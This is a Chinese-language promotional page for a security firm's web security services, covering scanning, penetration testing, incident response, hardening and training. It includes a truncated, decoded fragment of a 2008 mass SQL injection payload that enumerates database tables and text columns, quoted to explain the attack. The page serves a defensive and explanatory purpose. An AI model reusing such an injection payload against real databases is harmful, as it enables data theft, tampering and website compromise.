Web安全专业服务

杭州安恒信息技术有限公司是一家致力于为客户提供全面WEB应用安全解决方案的高科技企业。公司凭借领先的安全产品、资深的安全团队、优质的安全服务,成为2008北京奥组委安全产品与服务提供商。 由于WEB应用程序本身具有无法完全克服的安全漏洞,为黑客的入侵提供了可乘之机。安恒WEB安全专业服务(WEB Security Professional Service)通过专业的安全工具、白客级的专家团队,协助客户对WEB应用进行常规扫描、高频度检测,对WEB应用安全事件进行成因分析、应急修复。同时帮助安全开发及维护人员及时了解安全知识、提升安全技能,从而切实增强WEB应用的整体抗风险能力。
返回
服务内容
服务优势
应用案例



安恒WEB安全专业服务包含两大类、九方面:



远程服务

服务名称 服务内容 客户收益
Web应用深度漏洞检测 采用专业安全工具及安全专家人工检测相结合的方式,对Web应用进行深度弱点评估(黑盒测试)
通过评估了解Web应用中存在的安全漏洞消除漏洞,以降低Web应用所面临的安全风险
Web应用木马检测 利用安恒专业安全工具检测网页木马
了解Web应用的当前状况,是否已经被攻击挂马清除网页木马和恶意代码
渗透测试 经验丰富的专业安全人员,通过利用黑客攻击技术,模拟黑客入侵行为,对系统进行安全测试,从而发现系统中可能存在的弱点
了解Web应用抵御黑客入侵的强度 了解黑客是如何利用现有的漏洞
远程应急响应 对受攻击Web应用进行入侵分析、应急修复 及时解决安全事件,化解安全危机将安全事件影响的损失降到最低
Web应用安全通告 Web应用安全漏洞通告 重大WEB应用安全事件通告
及时了解最新的Web应用漏洞信息 及时规避新WEB应用安全漏洞带来的风险 了解最新外部安全环境




现场服务

服务名称 服务内容 客户收益
WEB应用安全加固 采用专业安全工具对WEB应用进行代码审核,并协助加固(白盒测试) 修补WEB应用漏洞,完善WEB应用编码。增强WEB应用抵御黑客入侵的强度 增强业务连续性
WEB应用安全培训 安全开发培训 安全维护培训
培养开发人员安全编码意识、安全编码能力 增强维护人员专业安全知识
现场应急响应 对受攻击WEB应用进行入侵分析、应急修复
及时解决安全事件,化解安全危机将安全事件影响的损失降到最低
安全巡检 对应用系统进行安全巡检,并在巡检结束后2个工作日内提交巡检报告 定期掌握应用系统存在的安全隐患及时落实修补措施



服务优势
国内首次发现网站群注风暴 2008年5月,安恒安全研究服务团队在某网站应急响应中首次发现并处理了全球性的网站群注风暴攻击,并且在国内首家发布了红色预警。 网络群注(Mass Injection), 可以简单翻译为巨量的SQL注入(SQL Injection)。SQL注入是一种目前最流行的利用网站应用程序漏洞对数据库以及服务器进行攻击的手段,这种攻击可能是窃取数据、插入数据、篡改数据、删除数据或者执行任意命令以致直接控制服务器。 这类攻击适用范围极为广泛,目前80%以上的网站挂马是出自这类攻击,而群注则在单个网站攻击的基础上在自动化和智能性方面更进了一步, 也就是说, 从发现网站目标到发现漏洞点到注射木马,全自动一气呵成, 效率极高,很多国外著名的安全网站也惨遭毒手, 更不用说是国内的许许多多防范不严的网站了。 某网站的群注攻击解码后:  DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@…
应用案例
杭州安恒信息技术有限公司 版权所有 © 2007-2017    浙ICP备09102757号 | 法律声明 | 隐私保护 |